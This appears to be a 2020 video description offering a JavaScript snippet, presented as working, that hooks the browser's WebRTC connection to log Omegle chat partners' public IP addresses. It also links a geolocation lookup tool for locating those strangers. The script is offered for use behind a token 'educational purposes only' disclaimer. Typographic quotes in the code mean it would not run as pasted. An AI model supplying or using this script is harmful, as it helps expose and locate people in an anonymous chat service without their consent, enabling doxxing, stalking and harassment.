How To Find Someones IP address on Omegle. (WORKING 2020)
🛑 This Video Is for educational Purposes only, i don’t recommend to recreate or retry any of the scenes shown in this video. i dont take any responsibility for further actions. 🛑
🔴 IP Finder Location Link: https://tools.keycdn.com/geo?host=
🔴 Omegle Link: https://www.omegle.com/
🔴 SCRIPT IS IN THE DESCRIPTION!!!!!!!
THIS METHOD IS NOT PATCHED TRIED IT JUST NOW (USE THIS)
window.oRTCPeerconnection = window.oRTCPeerConnection || window.RTCPeerConnection
window.RTCPeerConnection = function(…args) {
const pc = new window.oRTCPeerconnection(…args)
pc.oaddIceCandidate = pc.addIceCandidate
pc.addIceCandidate = function(iceCandidate, …rest) {
const fields = iceCandidate.candidate.split(‘ ‘)
if (fields[7] === ‘srflx’) {
console.log(‘IP Address:’, fields[4])
}
return pc.oaddIceCandidate(iceCandidate, …rest)
}
return pc
}
ip address